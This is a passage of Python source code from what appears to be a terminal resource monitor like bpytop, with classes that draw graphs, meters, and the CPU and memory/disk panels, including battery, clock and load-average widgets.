self.graphs[b].append(filler) self._create(data, new=True) def 
_create(self, data: List[int], new: bool = False): h_high: int h_low: int value: Dict[str, int] = { "left" : 0, "right" : 0 } val: int side: str #* Create the graph for h in range(self.height): h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100 h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0 for v in range(len(data)): if new: self.current = bool(v % 2) #* Switch between True and False graphs if new and v == 0: self.last = 0 for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore if val >= h_high: value[side] = 4 elif val <= h_low: value[side] = 0 else: if self.height == 1: value[side] = round(val * 4 / 100 + 0.5) else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1) if new: self.last = data[v] self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)] if data: self.last = data[-1] self.out = "" if self.height == 1: self.out += f'{"" if not self.colors else self.colors[self.last]}{self.graphs[self.current][0]}' elif self.height > 1: for h in range(self.height): if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}' self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}' if self.colors: self.out += f'{Term.fg}' def __call__(self, value: Union[int, None] = None) -> str: if not isinstance(value, int): return self.out self.current = not self.current if self.height == 1: if self.graphs[self.current][0].startswith(self.symbol[0.0]): self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1) else: self.graphs[self.current][0] = self.graphs[self.current][0][1:] else: for n in range(self.height): self.graphs[self.current][n] = self.graphs[self.current][n][1:] if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100 self._create([value]) return self.out def add(self, value: 
Union[int, None] = None) -> str: return self.__call__(value) def __str__(self): return self.out def __repr__(self): return repr(self.out) class Graphs: '''Holds all graphs and lists of graphs for dynamically created graphs''' cpu: Dict[str, Graph] = {} cores: List[Graph] = [NotImplemented] * THREADS temps: List[Graph] = [NotImplemented] * (THREADS + 1) net: Dict[str, Graph] = {} detailed_cpu: Graph = NotImplemented detailed_mem: Graph = NotImplemented pid_cpu: Dict[int, Graph] = {} class Meter: '''Creates a percentage meter __init__(value, width, theme, gradient_name) to create new meter __call__(value) to set value and return meter as a string __str__ returns last set meter as a string ''' out: str color_gradient: List[str] color_inactive: Color gradient_name: str width: int invert: bool saved: Dict[int, str] def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False): self.gradient_name = gradient_name self.color_gradient = THEME.gradient[gradient_name] self.color_inactive = THEME.meter_bg self.width = width self.saved = {} self.invert = invert self.out = self._create(value) def __call__(self, value: Union[int, None]) -> str: if not isinstance(value, int): return self.out if value > 100: value = 100 elif value < 0: value = 100 if value in self.saved: self.out = self.saved[value] else: self.out = self._create(value) return self.out def __str__(self) -> str: return self.out def __repr__(self): return repr(self.out) def _create(self, value: int) -> str: if value > 100: value = 100 elif value < 0: value = 100 out: str = "" for i in range(1, self.width + 1): if value >= round(i * 100 / self.width): out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}' else: out += self.color_inactive(Symbol.meter * (self.width + 1 - i)) break else: out += f'{Term.fg}' if not value in self.saved: self.saved[value] = out return out class Meters: cpu: Meter battery: Meter mem: 
Dict[str, Union[Meter, Graph]] = {}
	swap: Dict[str, Union[Meter, Graph]] = {}
	disks_used: Dict[str, Meter] = {}
	disks_free: Dict[str, Meter] = {}

class Box:
	'''Box class with all needed attributes for create_box() function'''
	name: str
	height_p: int   # height as percent of terminal height
	width_p: int    # width as percent of terminal width
	x: int
	y: int
	width: int
	height: int
	#* View mode flags: command-line ARG_MODE overrides the configured view_mode
	proc_mode: bool = (CONFIG.view_mode == "proc" and not ARG_MODE) or ARG_MODE == "proc"
	stat_mode: bool = (CONFIG.view_mode == "stat" and not ARG_MODE) or ARG_MODE == "stat"
	out: str
	bg: str
	_b_cpu_h: int
	_b_mem_h: int
	redraw_all: bool
	buffers: List[str] = []
	clock_on: bool = False
	clock: str = ""
	clock_len: int = 0
	resized: bool = False
	#* Custom substitutions available in the clock format string
	clock_custom_format: Dict[str, Any] = {
		"/host" : os.uname()[1],
		"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
		}
	if clock_custom_format["/host"].endswith(".local"):
		clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")

	@classmethod
	def calc_sizes(cls):
		'''Calculate sizes of boxes'''
		for sub in cls.__subclasses__():
			sub._calc_size() # type: ignore
			sub.resized = True # type: ignore

	@classmethod
	def draw_update_ms(cls, now: bool = True):
		'''Draw the "+ NNNms -" update-interval widget in the cpu box title bar.'''
		update_string: str = f'{CONFIG.update_ms}ms'
		xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
		#* Register clickable regions for the + and - buttons once
		if not "+" in Key.mouse:
			Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
			Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
		Draw.buffer("update_ms!"
if now and not Menu.active else "update_ms",
			f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
			f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
		if now and not Menu.active:
			Draw.clear("update_ms")
			#* Battery widget shares the title bar, so redraw it after clearing
			if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
				Draw.out("battery")

	@classmethod
	def draw_clock(cls, force: bool = False):
		'''Draw the clock in the cpu box title bar if the formatted time changed (or force=True).'''
		out: str = ""
		if force: pass
		elif not cls.clock_on or Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
		clock_string = cls.clock = strftime(CONFIG.draw_clock)
		#* Substitute custom tokens like /host and /user in the formatted string
		for custom in cls.clock_custom_format:
			if custom in clock_string:
				clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
		clock_len = len(clock_string[:(CpuBox.width-56)])
		#* If the clock shrank, erase the previously drawn area with box line chars first
		if cls.clock_len != clock_len and not CpuBox.resized:
			out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
		cls.clock_len = clock_len
		now: bool = False if Menu.active else not force
		out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
			f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
		Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
		if now and not Menu.active:
			if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
				Draw.out("battery")

	@classmethod
	def draw_bg(cls, now: bool = True):
		'''Draw all boxes outlines and titles'''
		Draw.buffer("bg", "".join(sub._draw_bg() for sub in cls.__subclasses__()), now=now, z=1000, only_save=Menu.active, once=True) # type: ignore
		cls.draw_update_ms(now=now)
		if CONFIG.draw_clock: cls.draw_clock(force=True)

class SubBox:
	'''Mixin holding geometry for an inner sub-box (e.g. the per-core panel in the cpu box).'''
	box_x: int = 0
	box_y: int = 0
	box_width: int = 0
	box_height: int = 0
	box_columns: int = 0
	column_size: int = 0

class CpuBox(Box, SubBox):
	name = "cpu"
	x = 1
	y = 1
	height_p = 32
	width_p = 100
	resized: bool = True
	redraw: bool = False
	buffer: str = "cpu"
	battery_percent: int = 1000   # 1000 acts as the "no reading yet" sentinel
	battery_secs: int = 0
	battery_status: str = "Unknown"
	old_battery_pos = 0
	old_battery_len = 0
	battery_path: Union[str, None] = ""   # "" = not probed yet, None = probed and not found
	battery_clear: bool = False
	battery_symbols: Dict[str, str] = {"Charging": "▲", "Discharging": "▼", "Full": "■", "Not charging": "■"}
	clock_block: bool = True
	Box.buffers.append(buffer)

	@classmethod
	def _calc_size(cls):
		'''Calculate box and per-core sub-box dimensions from the terminal size and thread count.'''
		cpu = CpuCollector
		height_p: int
		if cls.proc_mode: height_p = 20
		else: height_p = cls.height_p
		cls.width = round(Term.width * cls.width_p / 100)
		cls.height = round(Term.height * height_p / 100)
		if cls.height < 8: cls.height = 8
		Box._b_cpu_h = cls.height
		#THREADS = 64
		cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
		#* Pick widest per-core column layout (size 2 > 1 > 0) that fits in 2/3 of the box
		if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
			cls.column_size = 2
			cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
		elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
			cls.column_size = 1
			cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
		elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
			cls.column_size = 0
		else:
			cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
		if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
		cls.box_height = ceil(THREADS / cls.box_columns) + 4
		if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
		#* Center the sub-box vertically at the right edge of the cpu box
		cls.box_x = (cls.width - 1) - cls.box_width
		cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1

	@classmethod
	def _draw_bg(cls) -> str:
		'''Return the static outline: the cpu box, the Menu button and the per-core sub-box.'''
		if not "M" in Key.mouse:
			Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
		return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
		f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
		f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')

	@classmethod
	def battery_activity(cls) -> bool:
		'''Poll battery state via psutil/sysfs; return True if anything changed (or a redraw is pending).'''
		if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
			if cls.battery_percent != 1000:
				cls.battery_clear = True
			return False
		#* First call: locate a sysfs battery directory for reading the charge status
		if cls.battery_path == "":
			cls.battery_path = None
			if os.path.isdir("/sys/class/power_supply"):
				for directory in sorted(os.listdir("/sys/class/power_supply")):
					if directory.startswith('BAT') or 'battery' in directory.lower():
						cls.battery_path = f'/sys/class/power_supply/{directory}/'
						break
		return_true: bool = False
		percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
		if percent != cls.battery_percent:
			cls.battery_percent = percent
			return_true = True
		seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
		if seconds != cls.battery_secs:
			cls.battery_secs = seconds
			return_true = True
		status: str = "not_set"
		if cls.battery_path:
			status = readfile(cls.battery_path + "status", default="not_set")
		#* Fall back to psutil's power_plugged flag when sysfs gave no status
		if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
			status = "Charging" if cls.battery_percent < 100 else "Full"
		elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
			status = "Discharging"
		elif status == "not_set": status = "Unknown"
		if status != cls.battery_status:
			cls.battery_status = status
			return_true = True
		return return_true or cls.resized or cls.redraw or Menu.active

	@classmethod
	def _draw_fg(cls):
		'''Draw the dynamic cpu box contents: usage graphs, per-core meters, temps, battery and load average.'''
		cpu = CpuCollector
		if cpu.redraw: cls.redraw = True
		out: str = ""
		out_misc: str = ""
		lavg: str = ""
		x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
		bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
		hh: int = ceil(h / 2)
		hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
		ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
		#* (Re)create graphs and meters only when the layout changed
		if cls.resized or cls.redraw:
			if not "m" in Key.mouse: Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
			out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{ARG_MODE or CONFIG.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
			Graphs.cpu["up"] = Graph(w - bw - 3, hh, THEME.gradient["cpu"], cpu.cpu_usage[0])
			Graphs.cpu["down"] = Graph(w - bw - 3, h - hh, THEME.gradient["cpu"], cpu.cpu_usage[0], invert=True)
			Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
			if cls.column_size > 0 or ct_width > 0:
				for n in range(THREADS):
					Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
			if cpu.got_sensors:
				Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
				if cls.column_size > 1:
					for n in range(1, THREADS + 1):
						if not cpu.cpu_temp[n]:
							continue
						Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
			Draw.buffer("cpu_misc", out_misc, only_save=True)
		#* Battery widget in the title bar, redrawn only on change
		if CONFIG.show_battery and cls.battery_activity():
			bat_out: str = ""
			if cls.battery_secs > 0:
				battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
			else:
				battery_time = ""
			if not hasattr(Meters, "battery") or cls.resized:
				Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
			battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
			battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
			battery_pos = cls.width - battery_len - 17
			#* Erase old widget position if it moved or changed length
			if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
				bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
			cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
			bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
				("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
				f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
			Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
		elif cls.battery_clear:
			#* Battery disappeared: wipe the widget and reset all battery state
			out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
			cls.battery_clear = False
			cls.battery_percent = 1000
			cls.battery_secs = 0
			cls.battery_status = "Unknown"
			cls.old_battery_pos = 0
			cls.old_battery_len = 0
			cls.battery_path = ""
			Draw.clear("battery", saved=True)
		cx = cy = cc = 0
		ccw = (bw + 1) // cls.box_columns
		if cpu.cpu_freq:
			freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
			out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
		out += (f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_usage[0][-1])}{Mv.to(y + hh, x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_usage[0][-1])}'
			f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
			f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
		if cpu.got_sensors:
			try:
				out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
					f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
			except:
				#* Any sensor read/format failure permanently disables temperature display
				cpu.got_sensors = False
		cy += 1
		#* Per-thread rows, flowing into multiple columns of the sub-box
		for n in range(1, THREADS + 1):
			out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
			if cls.column_size > 0 or ct_width > 0:
				out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
			else:
				out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
			out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
			if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
				try:
					if cls.column_size > 1:
						out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
					else:
						out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
					out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
				except:
					cpu.got_sensors = False
			elif cpu.got_sensors and not hide_cores:
				out += f'{Mv.r(max(6, 6 * cls.column_size))}'
			out += f'{THEME.div_line(Symbol.v_line)}'
			cy += 1
			#* Column full: wrap to top of next column
			if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
				cc += 1; cy = 1; cx = ccw * cc
				if cc == cls.box_columns: break
		if cy < bh - 1: cy = bh - 1
		#* Load average at the bottom, format picked by available column width
		if cy < bh and cc < cls.box_columns:
			if cls.column_size == 2 and cpu.got_sensors:
				lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
			elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
				lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
			elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
				lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
			else:
				lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
			out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
		out += f'{Mv.to(y + h - 1, x + 1)}{THEME.graph_text}up {cpu.uptime}'
		Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}',
only_save=Menu.active)
		cls.resized = cls.redraw = cls.clock_block = False

class MemBox(Box):
	name = "mem"
	height_p = 38
	width_p = 45
	x = 1
	y = 1
	mem_meter: int = 0
	mem_size: int = 0      # layout size: 3 = graphs+values, 2 = medium, 1 = compact
	disk_meter: int = 0
	divider: int = 0       # x position of the mem/disks divider line
	mem_width: int = 0
	disks_width: int = 0
	graph_height: int
	resized: bool = True
	redraw: bool = False
	buffer: str = "mem"
	swap_on: bool = CONFIG.show_swap
	Box.buffers.append(buffer)
	mem_names: List[str] = ["used", "available", "cached", "free"]
	swap_names: List[str] = ["used", "free"]

	@classmethod
	def _calc_size(cls):
		'''Calculate box dimensions, mem/disk split and meter/graph sizes from terminal size and config.'''
		width_p: int; height_p: int
		if cls.stat_mode:
			width_p, height_p = 100, cls.height_p
		else:
			width_p, height_p = cls.width_p, cls.height_p
		cls.width = round(Term.width * width_p / 100)
		cls.height = round(Term.height * height_p / 100) + 1
		Box._b_mem_h = cls.height
		cls.y = Box._b_cpu_h + 1
		if CONFIG.show_disks:
			#* Split the box roughly in half between memory and disks
			cls.mem_width = ceil((cls.width - 3) / 2)
			cls.disks_width = cls.width - cls.mem_width - 3
			if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
			cls.divider = cls.x + cls.mem_width
		else:
			cls.mem_width = cls.width - 1
		item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
		if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
		elif cls.mem_width > 25: cls.mem_size = 2
		else: cls.mem_size = 1
		cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
		if cls.mem_size == 1: cls.mem_meter += 6
		if cls.mem_meter < 1: cls.mem_meter = 0
		if CONFIG.mem_graphs:
			cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
			if cls.graph_height == 0: cls.graph_height = 1
			if cls.graph_height > 1: cls.mem_meter += 6
		else:
			cls.graph_height = 0
		if CONFIG.show_disks:
			cls.disk_meter = cls.width - cls.mem_width - 23
			if cls.disks_width < 25:
				cls.disk_meter += 10
			if cls.disk_meter < 1: cls.disk_meter = 0

	@classmethod
	def _draw_bg(cls) -> str:
		'''Return the static outline: the mem box and, if enabled, the disks divider and title.'''
		if cls.proc_mode: return ""
		out: str = ""
		out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
		if CONFIG.show_disks:
			out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.title("disks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
				f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
				f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
				f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
		return out

	@classmethod
	def _draw_fg(cls):
		'''Draw the dynamic memory, swap and disks contents.'''
		if cls.proc_mode: return
		mem = MemCollector
		if mem.redraw: cls.redraw = True
		out: str = ""
		out_misc: str = ""
		gbg: str = ""
		gmv: str = ""
		gli: str = ""
		x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
		#* (Re)create meters/graphs and the clickable toggles only when layout changed
		if cls.resized or cls.redraw:
			cls._calc_size()
			out_misc += cls._draw_bg()
			Meters.mem = {}
			Meters.swap = {}
			Meters.disks_used = {}
			Meters.disks_free = {}
			if cls.mem_meter > 0:
				for name in cls.mem_names:
					if CONFIG.mem_graphs:
						Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
					else:
						Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
				if cls.swap_on:
					for name in cls.swap_names:
						if CONFIG.mem_graphs and not CONFIG.swap_disk:
							Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
						elif CONFIG.swap_disk and CONFIG.show_disks:
							#* swap-as-disk mode: render swap with the disk meters instead
							Meters.disks_used["__swap"] = Meter(mem.swap_percent["used"], cls.disk_meter, "used")
							if len(mem.disks) * 3 <= h + 1:
								Meters.disks_free["__swap"] = Meter(mem.swap_percent["free"], cls.disk_meter, "free")
							break
						else:
							Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
			if cls.disk_meter > 0:
				for n, name in enumerate(mem.disks.keys()):
					if n * 2 > h: break
					Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
					if len(mem.disks) * 3 <= h + 1:
						Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
			if not "g" in Key.mouse: Key.mouse["g"] = [[x + cls.mem_width - 8 + i, y-1] for i in range(5)]
			out_misc += (f'{Mv.to(y-1, x + cls.mem_width - 9)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
				f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
			if CONFIG.show_disks:
				if not "s" in Key.mouse: Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
				out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
					f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
			if Collector.collect_interrupt: return
			Draw.buffer("mem_misc", out_misc, only_save=True)
		try:
			#* Mem
			cx = 1; cy = 1
			out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
			if cls.graph_height > 0:
				gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
			if cls.graph_height >= 2:
				gbg = f'{Mv.l(1)}'
				gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
			big_mem: bool = cls.mem_width > 21
			for name in cls.mem_names:
				if Collector.collect_interrupt: return
				if cls.mem_size > 2:
					out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
						f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
					cy += 2 if not cls.graph_height else cls.graph_height + 1
				else:
					out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
					cy += 1 if not cls.graph_height else cls.graph_height
			#* Swap
			if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
				if h - cy > 5:
					if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
					cy += 1
				out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
				cy += 1
				for name in cls.swap_names:
					if Collector.collect_interrupt: return
					if cls.mem_size > 2:
						out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
							f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
						cy += 2 if not cls.graph_height else cls.graph_height + 1
					else:
						out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
			if cls.graph_height > 0 and not cy == h:
				out += f'{Mv.to(y+cy, x+cx)}{gli}'
			#* Disks
			if CONFIG.show_disks and mem.disks:
				cx = x + cls.mem_width - 1; cy = 0
				big_disk: bool = cls.disks_width >= 25
				gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
				for name, item in mem.disks.items():
					if Collector.collect_interrupt: return
					if not name in Meters.disks_used:
						continue
					if cy > h - 2: break
					out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
					out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["io"]}{Fx.ub}{THEME.main_fg}{Mv.to(y+cy+1, x+cx)}'
					out += f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U "
